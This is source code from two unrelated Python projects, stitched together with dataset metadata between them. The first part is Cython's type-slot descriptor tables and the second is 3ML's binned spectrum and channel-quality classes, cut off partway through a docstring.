# 'Z' Py_ssize_t *
# 's' char *
# 'S' char **
# 'r' int used only to signal exception
# 'B' Py_buffer *
# '-' dummy 'self' argument (not used)
# '*' rest of args passed as generic Python
# arg tuple and kw dict (must be last
# char in format string)
format_map = {
'O': PyrexTypes.py_object_type,
'v': PyrexTypes.c_void_type,
'p': PyrexTypes.c_void_ptr_type,
'P': PyrexTypes.c_void_ptr_ptr_type,
'i': PyrexTypes.c_int_type,
'b': PyrexTypes.c_bint_type,
'I': PyrexTypes.c_int_ptr_type,
'l': PyrexTypes.c_long_type,
'f': PyrexTypes.c_float_type,
'd': PyrexTypes.c_double_type,
'h': PyrexTypes.c_py_hash_t_type,
'z': PyrexTypes.c_py_ssize_t_type,
'Z': PyrexTypes.c_py_ssize_t_ptr_type,
's': PyrexTypes.c_char_ptr_type,
'S': PyrexTypes.c_char_ptr_ptr_type,
'r': PyrexTypes.c_returncode_type,
'B': PyrexTypes.c_py_buffer_ptr_type,
# 'T', '-' and '*' are handled otherwise
# and are not looked up in here
}
type_to_format_map = dict([(type_, format_)
for format_, type_ in format_map.iteritems()])
error_value_map = {
'O': "NULL",
'T': "NULL",
'i': "-1",
'b': "-1",
'l': "-1",
'r': "-1",
'h': "-1",
'z': "-1",
}
def __init__(self, arg_format, ret_format):
self.has_dummy_arg = 0
self.has_generic_args = 0
if arg_format[:1] == '-':
self.has_dummy_arg = 1
arg_format = arg_format[1:]
if arg_format[-1:] == '*':
self.has_generic_args = 1
arg_format = arg_format[:-1]
self.fixed_arg_format = arg_format
self.ret_format = ret_format
self.error_value = self.error_value_map.get(ret_format, None)
self.is_staticmethod = False
def num_fixed_args(self):
return len(self.fixed_arg_format)
def is_self_arg(self, i):
# argument is 'self' for methods or 'class' for classmethods
return self.fixed_arg_format[i] == 'T'
def returns_self_type(self):
# return type is same as 'self' argument type
return self.ret_format == 'T'
def fixed_arg_type(self, i):
return self.format_map[self.fixed_arg_format[i]]
def return_type(self):
return self.format_map[self.ret_format]
def format_from_type(self, arg_type):
if arg_type.is_pyobject:
arg_type = PyrexTypes.py_object_type
return self.type_to_format_map[arg_type]
def exception_value(self):
return self.error_value_map.get(self.ret_format)
def function_type(self, self_arg_override=None):
# Construct a C function type descriptor for this signature
args = []
for i in xrange(self.num_fixed_args()):
if self_arg_override is not None and self.is_self_arg(i):
assert isinstance(self_arg_override, PyrexTypes.CFuncTypeArg)
args.append(self_arg_override)
else:
arg_type = self.fixed_arg_type(i)
args.append(PyrexTypes.CFuncTypeArg("", arg_type, None))
if self_arg_override is not None and self.returns_self_type():
ret_type = self_arg_override.type
else:
ret_type = self.return_type()
exc_value = self.exception_value()
return PyrexTypes.CFuncType(ret_type, args, exception_value = exc_value)
def method_flags(self):
if self.ret_format == "O":
full_args = self.fixed_arg_format
if self.has_dummy_arg:
full_args = "O" + full_args
if full_args in ["O", "T"]:
if self.has_generic_args:
return [method_varargs, method_keywords]
else:
return [method_noargs]
elif full_args in ["OO", "TO"] and not self.has_generic_args:
return [method_onearg]
if self.is_staticmethod:
return [method_varargs, method_keywords]
return None
class SlotDescriptor(object):
# Abstract base class for type slot descriptors.
#
# slot_name string Member name of the slot in the type object
# is_initialised_dynamically Is initialised by code in the module init function
# py3 Indicates presence of slot in Python 3
# py2 Indicates presence of slot in Python 2
# ifdef Full #ifdef string that slot is wrapped in. Using this causes py3, py2 and flags to be ignored.)
def __init__(self, slot_name, dynamic=0,
py3=True, py2=True, ifdef=None):
self.slot_name = slot_name
self.is_initialised_dynamically = dynamic
self.ifdef = ifdef
self.py3 = py3
self.py2 = py2
def preprocessor_guard_code(self):
ifdef = self.ifdef
py2 = self.py2
py3 = self.py3
guard = None
if ifdef:
guard = ("#if %s" % ifdef)
elif not py3 or py3 == '<RESERVED>':
guard = ("#if PY_MAJOR_VERSION < 3")
elif not py2:
guard = ("#if PY_MAJOR_VERSION >= 3")
return guard
def generate(self, scope, code):
if self.is_initialised_dynamically:
value = 0
else:
value = self.slot_code(scope)
preprocessor_guard = self.preprocessor_guard_code()
if preprocessor_guard:
code.putln(preprocessor_guard)
code.putln("%s, /*%s*/" % (value, self.slot_name))
if self.py3 == '<RESERVED>':
code.putln("#else")
code.putln("0, /*reserved*/")
if preprocessor_guard:
code.putln("#endif")
# Some C implementations have trouble statically
# initialising a global with a pointer to an extern
# function, so we initialise some of the type slots
# in the module init function instead.
def generate_dynamic_init_code(self, scope, code):
if self.is_initialised_dynamically:
value = self.slot_code(scope)
if value != "0":
code.putln("%s.%s = %s;" % (
scope.parent_type.typeobj_cname,
self.slot_name,
value
)
)
class FixedSlot(SlotDescriptor):
# Descriptor for a type slot with a fixed value.
#
# value string
def __init__(self, slot_name, value, py3=True, py2=True, ifdef=None):
SlotDescriptor.__init__(self, slot_name, py3=py3, py2=py2, ifdef=ifdef)
self.value = value
def slot_code(self, scope):
return self.value
class EmptySlot(FixedSlot):
# Descriptor for a type slot whose value is always 0.
def __init__(self, slot_name, py3=True, py2=True, ifdef=None):
FixedSlot.__init__(self, slot_name, "0", py3=py3, py2=py2, ifdef=ifdef)
class MethodSlot(SlotDescriptor):
# Type slot descriptor for a user-definable method.
#
# signature Signature
# method_name string The __xxx__ name of the method
# alternatives [string] Alternative list of __xxx__ names for the method
def __init__(self, signature, slot_name, method_name, fallback=None,
py3=True, py2=True, ifdef=None):
SlotDescriptor.__init__(self, slot_name, py3=py3, py2=py2, ifdef=ifdef)
self.signature = signature
self.slot_name = slot_name
self.method_name = method_name
self.alternatives = []
method_name_to_slot[method_name] = self
#
if fallback:
self.alternatives.append(fallback)
for alt in (self.py2, self.py3):
if isinstance(alt, (tuple, list)):
slot_name, method_name = alt
self.alternatives.append(method_name)
method_name_to_slot[method_name] = self
def slot_code(self, scope):
entry = scope.lookup_here(self.method_name)
if entry and entry.func_cname:
return entry.func_cname
for method_name in self.alternatives:
entry = scope.lookup_here(method_name)
if entry and entry.func_cname:
return entry.func_cname
return "0"
class InternalMethodSlot(SlotDescriptor):
# Type slot descriptor for a method which is always
# synthesized by Cython.
#
# slot_name string Member name of the slot in the type object
def __init__(self, slot_name, **kargs):
SlotDescriptor.__init__(self, slot_name, **kargs)
def slot_code(self, scope):
return scope.mangle_internal(self.slot_name)
class GCDependentSlot(InternalMethodSlot):
# Descriptor for a slot whose value depends on whether
# the type participates in GC.
def __init__(self, slot_name, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
def slot_code(self, scope):
if not scope.needs_gc():
return "0"
if not scope.has_pyobject_attrs:
# if the type does not have object attributes, it can
# delegate GC methods to its parent - iff the parent
# functions are defined in the same module
parent_type_scope = scope.parent_type.base_type.scope
if scope.parent_scope is parent_type_scope.parent_scope:
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return self.slot_code(parent_type_scope)
return InternalMethodSlot.slot_code(self, scope)
class ConstructorSlot(InternalMethodSlot):
# Descriptor for tp_new and tp_dealloc.
def __init__(self, slot_name, method, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
self.method = method
def slot_code(self, scope):
if scope.parent_type.base_type \
and not scope.has_pyobject_attrs \
and not scope.lookup_here(self.method):
# if the type does not have object attributes, it can
# delegate GC methods to its parent - iff the parent
# functions are defined in the same module
parent_type_scope = scope.parent_type.base_type.scope
if scope.parent_scope is parent_type_scope.parent_scope:
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return self.slot_code(parent_type_scope)
return InternalMethodSlot.slot_code(self, scope)
class SyntheticSlot(InternalMethodSlot):
# Type slot descriptor for a synthesized method which
# dispatches to one or more user-defined methods depending
# on its arguments. If none of the relevant methods are
# defined, the method will not be synthesized and an
# alternative default value will be placed in the type
# slot.
def __init__(self, slot_name, user_methods, default_value, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
self.user_methods = user_methods
self.default_value = default_value
def slot_code(self, scope):
if scope.defines_any(self.user_methods):
return InternalMethodSlot.slot_code(self, scope)
else:
return self.default_value
class TypeFlagsSlot(SlotDescriptor):
# Descriptor for the type flags slot.
def slot_code(self, scope):
value = "Py_TPFLAGS_DEFAULT|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER"
if not scope.parent_type.is_final_type:
value += "|Py_TPFLAGS_BASETYPE"
if scope.needs_gc():
value += "|Py_TPFLAGS_HAVE_GC"
return value
class DocStringSlot(SlotDescriptor):
# Descriptor for the docstring slot.
def slot_code(self, scope):
if scope.doc is not None:
if scope.doc.is_unicode:
doc = scope.doc.utf8encode()
else:
doc = scope.doc.byteencode()
return '__Pyx_DOCSTR("%s")' % StringEncoding.escape_byte_string(doc)
else:
return "0"
class SuiteSlot(SlotDescriptor):
# Descriptor for a substructure of the type object.
#
# sub_slots [SlotDescriptor]
def __init__(self, sub_slots, slot_type, slot_name):
SlotDescriptor.__init__(self, slot_name)
self.sub_slots = sub_slots
self.slot_type = slot_type
substructures.append(self)
def substructure_cname(self, scope):
return "%s%s_%s" % (Naming.pyrex_prefix, self.slot_name, scope.class_name)
def slot_code(self, scope):
return "&%s" % self.substructure_cname(scope)
def generate_substructure(self, scope, code):
code.putln("")
code.putln(
"static %s %s = {" % (
self.slot_type,
self.substructure_cname(scope)))
for slot in self.sub_slots:
slot.generate(scope, code)
code.putln("};")
substructures = [] # List of all SuiteSlot instances
class MethodTableSlot(SlotDescriptor):
# Slot descriptor for the method table.
def slot_code(self, scope):
return scope.method_table_cname
class MemberTableSlot(SlotDescriptor):
# Slot descriptor for the table of Python-accessible attributes.
def slot_code(self, scope):
return "0"
class GetSetSlot(SlotDescriptor):
# Slot descriptor for the table of attribute get & set methods.
def slot_code(self, scope):
if scope.property_entries:
return scope.getset_table_cname
else:
return "0"
class BaseClassSlot(SlotDescriptor):
# Slot descriptor for the base class slot.
def __init__(self, name):
SlotDescriptor.__init__(self, name, dynamic = 1)
def generate_dynamic_init_code(self, scope, code):
base_type = scope.parent_type.base_type
if base_type:
code.putln("%s.%s = %s;" % (
scope.parent_type.typeobj_cname,
self.slot_name,
base_type.typeptr_cname))
# The following dictionary maps __xxx__ method names to slot descriptors.
method_name_to_slot = {}
## The following slots are (or could be) initialised with an
## extern function pointer.
#
#slots_initialised_from_extern = (
# "tp_free",
#)
#------------------------------------------------------------------------------------------
#
# Utility functions for accessing slot table data structures
#
#------------------------------------------------------------------------------------------
def get_special_method_signature(name):
# Given a method name, if it is a special method,
# return its signature, else return None.
slot = method_name_to_slot.get(name)
if slot:
return slot.signature
else:
return None
def get_property_accessor_signature(name):
# Return signature of accessor for an extension type
# property, else None.
return property_accessor_signatures.get(name)
def get_base_slot_function(scope, slot):
# Returns the function implementing this slot in the baseclass.
# This is useful for enabling the compiler to optimize calls
# that recursively climb the class hierarchy.
base_type = scope.parent_type.base_type
if scope.parent_scope is base_type.scope.parent_scope:
parent_slot = slot.slot_code(base_type.scope)
if parent_slot != '0':
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return parent_slot
return None
#------------------------------------------------------------------------------------------
#
# Signatures for generic Python functions and methods.
#
#------------------------------------------------------------------------------------------
pyfunction_signature = Signature("-*", "O")
pymethod_signature = Signature("T*", "O")
#------------------------------------------------------------------------------------------
#
# Signatures for simple Python functions.
#
#------------------------------------------------------------------------------------------
pyfunction_noargs = Signature("-", "O")
pyfunction_onearg = Signature("-O", "O")
#------------------------------------------------------------------------------------------
#
# Signatures for the various kinds of function that
# can appear in the type object and its substructures.
#
#------------------------------------------------------------------------------------------
unaryfunc = Signature("T", "O") # typedef PyObject * (*unaryfunc)(PyObject *);
binaryfunc = Signature("OO", "O") # typedef PyObject * (*binaryfunc)(PyObject *, PyObject *);
ibinaryfunc = Signature("TO", "O") # typedef PyObject * (*binaryfunc)(PyObject *, PyObject *);
ternaryfunc = Signature("OOO", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
iternaryfunc = Signature("TOO", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
callfunc = Signature("T*", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
inquiry = Signature("T", "i") # typedef int (*inquiry)(PyObject *);
lenfunc = Signature("T", "z") # typedef Py_ssize_t (*lenfunc)(PyObject *);
# typedef int (*coercion)(PyObject **, PyObject **);
intargfunc = Signature("Ti", "O") # typedef PyObject *(*intargfunc)(PyObject *, int);
ssizeargfunc = Signature("Tz", "O") # typedef PyObject *(*ssizeargfunc)(PyObject *, Py_ssize_t);
intintargfunc = Signature("Tii", "O") # typedef PyObject *(*intintargfunc)(PyObject *, int, int);
ssizessizeargfunc = Signature("Tzz", "O") # typedef PyObject *(*ssizessizeargfunc)(PyObject *, Py_ssize_t, Py_ssize_t);
intobjargproc = Signature("TiO", 'r') # typedef int(*intobjargproc)(PyObject *, int, PyObject *);
ssizeobjargproc = Signature("TzO", 'r') # typedef int(*ssizeobjargproc)(PyObject *, Py_ssize_t, PyObject *);
intintobjargproc = Signature("TiiO", 'r') # typedef int(*intintobjargproc)(PyObject *, int, int, PyObject *);
ssizessizeobjargproc = Signature("TzzO", 'r') # typedef int(*ssizessizeobjargproc)(PyObject *, Py_ssize_t, Py_ssize_t, PyObject *);
intintargproc = Signature("Tii", 'r')
ssizessizeargproc = Signature("Tzz", 'r')
objargfunc = Signature("TO", "O")
objobjargproc = Signature("TOO", 'r') # typedef int (*objobjargproc)(PyObject *, PyObject *, PyObject *);
readbufferproc = Signature("TzP", "z") # typedef Py_ssize_t (*readbufferproc)(PyObject *, Py_ssize_t, void **);
writebufferproc = Signature("TzP", "z") # typedef Py_ssize_t (*writebufferproc)(PyObject *, Py_ssize_t, void **);
segcountproc = Signature("TZ", "z") # typedef Py_ssize_t (*segcountproc)(PyObject *, Py_ssize_t *);
charbufferproc = Signature("TzS", "z") # typedef Py_ssize_t (*charbufferproc)(PyObject *, Py_ssize_t, char **);
objargproc = Signature("TO", 'r') # typedef int (*objobjproc)(PyObject *, PyObject *);
# typedef int (*visitproc)(PyObject *, void *);
# typedef int (*traverseproc)(PyObject *, visitproc, void *);
destructor = Signature("T", "v") # typedef void (*destructor)(PyObject *);
# printfunc = Signature("TFi", 'r') # typedef int (*printfunc)(PyObject *, FILE *, int);
# typedef PyObject *(*getattrfunc)(PyObject *, char *);
getattrofunc = Signature("TO", "O") # typedef PyObject *(*getattrofunc)(PyObject *, PyObject *);
# typedef int (*setattrfunc)(PyObject *, char *, PyObject *);
setattrofunc = Signature("TOO", 'r') # typedef int (*setattrofunc)(PyObject *, PyObject *, PyObject *);
delattrofunc = Signature("TO", 'r')
cmpfunc = Signature("TO", "i") # typedef int (*cmpfunc)(PyObject *, PyObject *);
reprfunc = Signature("T", "O") # typedef PyObject *(*reprfunc)(PyObject *);
hashfunc = Signature("T", "h") # typedef Py_hash_t (*hashfunc)(PyObject *);
# typedef PyObject *(*richcmpfunc) (PyObject *, PyObject *, int);
richcmpfunc = Signature("OOi", "O") # typedef PyObject *(*richcmpfunc) (PyObject *, PyObject *, int);
getiterfunc = Signature("T", "O") # typedef PyObject *(*getiterfunc) (PyObject *);
iternextfunc = Signature("T", "O") # typedef PyObject *(*iternextfunc) (PyObject *);
descrgetfunc = Signature("TOO", "O") # typedef PyObject *(*descrgetfunc) (PyObject *, PyObject *, PyObject *);
descrsetfunc = Signature("TOO", 'r') # typedef int (*descrsetfunc) (PyObject *, PyObject *, PyObject *);
descrdelfunc = Signature("TO", 'r')
initproc = Signature("T*", 'r') # typedef int (*initproc)(PyObject *, PyObject *, PyObject *);
# typedef PyObject *(*newfunc)(struct _typeobject *, PyObject *, PyObject *);
# typedef PyObject *(*allocfunc)(struct _typeobject *, int);
getbufferproc = Signature("TBi", "r") # typedef int (*getbufferproc)(PyObject *, Py_buffer *, int);
releasebufferproc = Signature("TB", "v") # typedef void (*releasebufferproc)(PyObject *, Py_buffer *);
#------------------------------------------------------------------------------------------
#
# Signatures for accessor methods of properties.
#
#------------------------------------------------------------------------------------------
property_accessor_signatures = {
'__get__': Signature("T", "O"),
'__set__': Signature("TO", 'r'),
'__del__': Signature("T", 'r')
}
#------------------------------------------------------------------------------------------
#
# Descriptor tables for the slots of the various type object
# substructures, in the order they appear in the structure.
#
#------------------------------------------------------------------------------------------
PyNumberMethods = (
MethodSlot(binaryfunc, "nb_add", "__add__"),
MethodSlot(binaryfunc, "nb_subtract", "__sub__"),
MethodSlot(binaryfunc, "nb_multiply", "__mul__"),
MethodSlot(binaryfunc, "nb_divide", "__div__", py3 = False),
MethodSlot(binaryfunc, "nb_remainder", "__mod__"),
MethodSlot(binaryfunc, "nb_divmod", "__divmod__"),
MethodSlot(ternaryfunc, "nb_power", "__pow__"),
MethodSlot(unaryfunc, "nb_negative", "__neg__"),
MethodSlot(unaryfunc, "nb_positive", "__pos__"),
MethodSlot(unaryfunc, "nb_absolute", "__abs__"),
MethodSlot(inquiry, "nb_nonzero", "__nonzero__", py3 = ("nb_bool", "__bool__")),
MethodSlot(unaryfunc, "nb_invert", "__invert__"),
MethodSlot(binaryfunc, "nb_lshift", "__lshift__"),
MethodSlot(binaryfunc, "nb_rshift", "__rshift__"),
MethodSlot(binaryfunc, "nb_and", "__and__"),
MethodSlot(binaryfunc, "nb_xor", "__xor__"),
MethodSlot(binaryfunc, "nb_or", "__or__"),
EmptySlot("nb_coerce", py3 = False),
MethodSlot(unaryfunc, "nb_int", "__int__", fallback="__long__"),
MethodSlot(unaryfunc, "nb_long", "__long__", fallback="__int__", py3 = "<RESERVED>"),
MethodSlot(unaryfunc, "nb_float", "__float__"),
MethodSlot(unaryfunc, "nb_oct", "__oct__", py3 = False),
MethodSlot(unaryfunc, "nb_hex", "__hex__", py3 = False),
# Added in release 2.0
MethodSlot(ibinaryfunc, "nb_inplace_add", "__iadd__"),
MethodSlot(ibinaryfunc, "nb_inplace_subtract", "__isub__"),
MethodSlot(ibinaryfunc, "nb_inplace_multiply", "__imul__"),
MethodSlot(ibinaryfunc, "nb_inplace_divide", "__idiv__", py3 = False),
MethodSlot(ibinaryfunc, "nb_inplace_remainder", "__imod__"),
MethodSlot(ibinaryfunc, "nb_inplace_power", "__ipow__"), # actually ternaryfunc!!!
MethodSlot(ibinaryfunc, "nb_inplace_lshift", "__ilshift__"),
MethodSlot(ibinaryfunc, "nb_inplace_rshift", "__irshift__"),
MethodSlot(ibinaryfunc, "nb_inplace_and", "__iand__"),
MethodSlot(ibinaryfunc, "nb_inplace_xor", "__ixor__"),
MethodSlot(ibinaryfunc, "nb_inplace_or", "__ior__"),
# Added in release 2.2
# The following require the Py_TPFLAGS_HAVE_CLASS flag
MethodSlot(binaryfunc, "nb_floor_divide", "__floordiv__"),
MethodSlot(binaryfunc, "nb_true_divide", "__truediv__"),
MethodSlot(ibinaryfunc, "nb_inplace_floor_divide", "__ifloordiv__"),
MethodSlot(ibinaryfunc, "nb_inplace_true_divide", "__itruediv__"),
# Added in release 2.5
MethodSlot(unaryfunc, "nb_index", "__index__", ifdef = "PY_VERSION_HEX >= 0x02050000")
)
PySequenceMethods = (
MethodSlot(lenfunc, "sq_length", "__len__"),
EmptySlot("sq_concat"), # nb_add used instead
EmptySlot("sq_repeat"), # nb_multiply used instead
SyntheticSlot("sq_item", ["__getitem__"], "0"), #EmptySlot("sq_item"), # mp_subscript used instead
MethodSlot(ssizessizeargfunc, "sq_slice", "__getslice__"),
EmptySlot("sq_ass_item"), # mp_ass_subscript used instead
SyntheticSlot("sq_ass_slice", ["__setslice__", "__delslice__"], "0"),
MethodSlot(cmpfunc, "sq_contains", "__contains__"),
EmptySlot("sq_inplace_concat"), # nb_inplace_add used instead
EmptySlot("sq_inplace_repeat"), # nb_inplace_multiply used instead
)
PyMappingMethods = (
MethodSlot(lenfunc, "mp_length", "__len__"),
MethodSlot(objargfunc, "mp_subscript", "__getitem__"),
SyntheticSlot("mp_ass_subscript", ["__setitem__", "__delitem__"], "0"),
)
PyBufferProcs = (
MethodSlot(readbufferproc, "bf_getreadbuffer", "__getreadbuffer__", py3 = False),
MethodSlot(writebufferproc, "bf_getwritebuffer", "__getwritebuffer__", py3 = False),
MethodSlot(segcountproc, "bf_getsegcount", "__getsegcount__", py3 = False),
MethodSlot(charbufferproc, "bf_getcharbuffer", "__getcharbuffer__", py3 = False),
MethodSlot(getbufferproc, "bf_getbuffer", "__getbuffer__", ifdef = "PY_VERSION_HEX >= 0x02060000"),
MethodSlot(releasebufferproc, "bf_releasebuffer", "__releasebuffer__", ifdef = "PY_VERSION_HEX >= 0x02060000")
)
#------------------------------------------------------------------------------------------
#
# The main slot table. This table contains descriptors for all the
# top-level type slots, beginning with tp_dealloc, in the order they
# appear in the type object.
#
#------------------------------------------------------------------------------------------
slot_table = (
ConstructorSlot("tp_dealloc", '__dealloc__'),
EmptySlot("tp_print"), #MethodSlot(printfunc, "tp_print", "__print__"),
EmptySlot("tp_getattr"),
EmptySlot("tp_setattr"),
MethodSlot(cmpfunc, "tp_compare", "__cmp__", py3 = '<RESERVED>'),
MethodSlot(reprfunc, "tp_repr", "__repr__"),
SuiteSlot(PyNumberMethods, "PyNumberMethods", "tp_as_number"),
SuiteSlot(PySequenceMethods, "PySequenceMethods", "tp_as_sequence"),
SuiteSlot(PyMappingMethods, "PyMappingMethods", "tp_as_mapping"),
MethodSlot(hashfunc, "tp_hash", "__hash__"),
MethodSlot(callfunc, "tp_call", "__call__"),
MethodSlot(reprfunc, "tp_str", "__str__"),
SyntheticSlot("tp_getattro", ["__getattr__","__getattribute__"], "0"), #"PyObject_GenericGetAttr"),
SyntheticSlot("tp_setattro", ["__setattr__", "__delattr__"], "0"), #"PyObject_GenericSetAttr"),
SuiteSlot(PyBufferProcs, "PyBufferProcs", "tp_as_buffer"),
TypeFlagsSlot("tp_flags"),
DocStringSlot("tp_doc"),
GCDependentSlot("tp_traverse"),
GCDependentSlot("tp_clear"),
# Later -- synthesize a method to split into separate ops?
MethodSlot(richcmpfunc, "tp_richcompare", "__richcmp__"),
EmptySlot("tp_weaklistoffset"),
MethodSlot(getiterfunc, "tp_iter", "__iter__"),
MethodSlot(iternextfunc, "tp_iternext", "__next__"),
MethodTableSlot("tp_methods"),
MemberTableSlot("tp_members"),
GetSetSlot("tp_getset"),
BaseClassSlot("tp_base"), #EmptySlot("tp_base"),
EmptySlot("tp_dict"),
SyntheticSlot("tp_descr_get", ["__get__"], "0"),
SyntheticSlot("tp_descr_set", ["__set__", "__delete__"], "0"),
EmptySlot("tp_dictoffset"),
MethodSlot(initproc, "tp_init", "__init__"),
EmptySlot("tp_alloc"), #FixedSlot("tp_alloc", "PyType_GenericAlloc"),
InternalMethodSlot("tp_new"),
EmptySlot("tp_free"),
EmptySlot("tp_is_gc"),
EmptySlot("tp_bases"),
EmptySlot("tp_mro"),
EmptySlot("tp_cache"),
EmptySlot("tp_subclasses"),
EmptySlot("tp_weaklist"),
EmptySlot("tp_del"),
EmptySlot("tp_version_tag", ifdef="PY_VERSION_HEX >= 0x02060000"),
)
#------------------------------------------------------------------------------------------
#
# Descriptors for special methods which don't appear directly
# in the type object or its substructures. These methods are
# called from slot functions synthesized by Cython.
#
#------------------------------------------------------------------------------------------
MethodSlot(initproc, "", "__cinit__")
MethodSlot(destructor, "", "__dealloc__")
MethodSlot(objobjargproc, "", "__setitem__")
MethodSlot(objargproc, "", "__delitem__")
MethodSlot(ssizessizeobjargproc, "", "__setslice__")
MethodSlot(ssizessizeargproc, "", "__delslice__")
MethodSlot(getattrofunc, "", "__getattr__")
MethodSlot(setattrofunc, "", "__setattr__")
MethodSlot(delattrofunc, "", "__delattr__")
MethodSlot(descrgetfunc, "", "__get__")
MethodSlot(descrsetfunc, "", "__set__")
MethodSlot(descrdelfunc, "", "__delete__")
# Method flags for python-exposed methods.
method_noargs = "METH_NOARGS"
method_onearg = "METH_O"
method_varargs = "METH_VARARGS"
method_keywords = "METH_KEYWORDS"
method_coexist = "METH_COEXIST"
|
apache-2.0
| 73,553,137,307,292,590
| 39.293734
| 133
| 0.573692
| false
| 3.754866
| false
| false
| false
|
volodymyrss/3ML
|
threeML/plugins/spectrum/binned_spectrum.py
|
1
|
20977
|
import numpy as np
import pandas as pd
from threeML.utils.histogram import Histogram
from threeML.utils.interval import Interval, IntervalSet
from threeML.plugins.OGIP.response import InstrumentResponse
from threeML.utils.stats_tools import sqrt_sum_of_squares
class Channel(Interval):
@property
def channel_width(self):
return self._get_width()
class ChannelSet(IntervalSet):
INTERVAL_TYPE = Channel
@classmethod
def from_instrument_response(cls, instrument_response):
"""
Build EBOUNDS interval from an instrument response
:param instrument_response:
:return:
"""
new_ebounds = cls.from_list_of_edges(instrument_response.ebounds)
return new_ebounds
@property
def channels_widths(self):
return np.array([channel.channel_width for channel in self._intervals ])
class Quality(object):
def __init__(self, quality):
"""
simple class to formalize the quality flags used in spectra
:param quality: a quality array
"""
#total_length = len(quality)
n_elements = 1
for dim in quality.shape:
n_elements *= dim
good = quality == 'good'
warn = quality == 'warn'
bad = quality == 'bad'
assert n_elements == good.sum() + warn.sum() + bad.sum(), 'quality can only contain "good", "warn", and "bad"'
self._good = good
self._warn = warn
self._bad = bad
self._quality = quality
def __len__(self):
return len(self._quality)
def get_slice(self, idx):
return Quality(self._quality[idx,:])
@property
def good(self):
return self._good
@property
def warn(self):
return self._warn
@property
def bad(self):
return self._bad
@property
def n_elements(self):
return len(self._quality)
@classmethod
def from_ogip(cls, ogip_quality):
good = ogip_quality == 0
warn = ogip_quality == 2
bad = np.logical_and(~good, ~warn)
quality = np.empty_like(ogip_quality,dtype='|S4')
quality[:] = 'good'
# quality = np.array(['good' for i in xrange(len(ogip_quality))])
#quality[good] = 'good'
quality[warn] = 'warn'
quality[bad] = 'bad'
return cls(quality)
def to_ogip(self):
"""
makes a quality array following the OGIP standards:
0 = good
2 = warn
5 = bad
:return:
"""
ogip_quality = np.zeros(self._quality.shape,dtype=np.int32)
ogip_quality[self.warn] = 2
ogip_quality[self.bad] = 5
return ogip_quality
@classmethod
def create_all_good(cls, n_channels):
"""
construct a quality object with all good channels
:param n_channels:
:return:
"""
quality = np.array(['good' for i in xrange(int(n_channels))])
return cls(quality)
class BinnedSpectrum(Histogram):
INTERVAL_TYPE = Channel
def __init__(self, counts, exposure, ebounds, count_errors=None, sys_errors=None, quality=None, scale_factor=1.,
is_poisson=False, mission=None, instrument=None, tstart=None, tstop=None):
"""
A general binned histogram of either Poisson or non-Poisson rates. While the input is in counts, 3ML spectra work
in rates, so this class uses the exposure to construct the rates from the counts.
:param counts: an array of counts
:param exposure: the exposure for the counts
:param ebounds: the len(counts) + 1 energy edges of the histogram or an instance of EBOUNDSIntervalSet
:param count_errors: (optional) the count errors for the spectra
:param sys_errors: (optional) systematic errors on the spectrum
:param quality: quality instance marking good, bad and warned channels. If not provided, all channels are assumed to be good
:param scale_factor: scaling parameter of the spectrum
:param is_poisson: if the histogram is Poisson
:param mission: the mission name
:param instrument: the instrument name
"""
# attach the parameters ot the object
self._is_poisson = is_poisson
self._exposure = exposure
self._scale_factor = scale_factor
# if we do not have a ChannelSet,
if not isinstance(ebounds, ChannelSet):
# make one from the edges
ebounds = ChannelSet.from_list_of_edges(ebounds) #type: ChannelSet
if count_errors is not None:
assert not self._is_poisson, "Read count errors but spectrum marked Poisson"
# convert counts to rate
rate_errors = count_errors / self._exposure
else:
rate_errors = None
if sys_errors is None:
sys_errors = np.zeros_like(counts)
self._sys_errors = sys_errors
# convert rates to counts
rates = counts / self._exposure
if quality is not None:
# check that we are using the 3ML quality type
assert isinstance(quality, Quality)
self._quality = quality
else:
# if there is no quality, then assume all channels are good
self._quality = Quality.create_all_good(len(rates))
if mission is None:
self._mission = 'UNKNOWN'
else:
self._mission = mission
if instrument is None:
self._instrument = 'UNKNOWN'
else:
self._instrument = instrument
self._tstart = tstart
self._tstop = tstop
# pass up to the binned spectrum
super(BinnedSpectrum, self).__init__(list_of_intervals=ebounds,
contents=rates,
errors=rate_errors,
sys_errors=sys_errors,
is_poisson=is_poisson)
@property
def n_channel(self):
return len(self)
@property
def rates(self):
"""
:return: rates per channel
"""
return self._contents
@property
def total_rate(self):
"""
:return: total rate
"""
return self._contents.sum()
@property
def total_rate_error(self):
"""
:return: total rate error
"""
assert self.is_poisson == False, "Cannot request errors on rates for a Poisson spectrum"
return sqrt_sum_of_squares(self._errors)
@property
def counts(self):
"""
:return: counts per channel
"""
return self._contents * self.exposure
@property
def count_errors(self):
"""
:return: count error per channel
"""
#VS: impact of this change is unclear to me, it seems to make sense and the tests pass
if self.is_poisson:
return None
else:
return self._errors * self.exposure
@property
def total_count(self):
"""
:return: total counts
"""
return self.counts.sum()
@property
def total_count_error(self):
"""
:return: total count error
"""
#VS: impact of this change is unclear to me, it seems to make sense and the tests pass
if self.is_poisson:
return None
else:
return sqrt_sum_of_squares(self.count_errors)
@property
def tstart(self):
return self._tstart
@property
def tstop(self):
return self._tstop
@property
def is_poisson(self):
return self._is_poisson
@property
def rate_errors(self):
"""
If the spectrum has no Poisson error (POISSER is False in the header), this will return the STAT_ERR column
:return: errors on the rates
"""
if self.is_poisson:
return None
else:
return self._errors
@property
def n_channels(self):
return len(self)
@property
def sys_errors(self):
"""
Systematic errors per channel. This is nonzero only if the SYS_ERR column is present in the input file.
:return: the systematic errors stored in the input spectrum
"""
return self._sys_errors
@property
def exposure(self):
"""
Exposure in seconds
:return: exposure
"""
return self._exposure
@property
def quality(self):
return self._quality
@property
def scale_factor(self):
return self._scale_factor
@property
def mission(self):
return self._mission
@property
def instrument(self):
return self._instrument
def clone(self, new_counts=None, new_count_errors=None, new_exposure=None):
"""
make a new spectrum with new counts and errors and all other
parameters the same
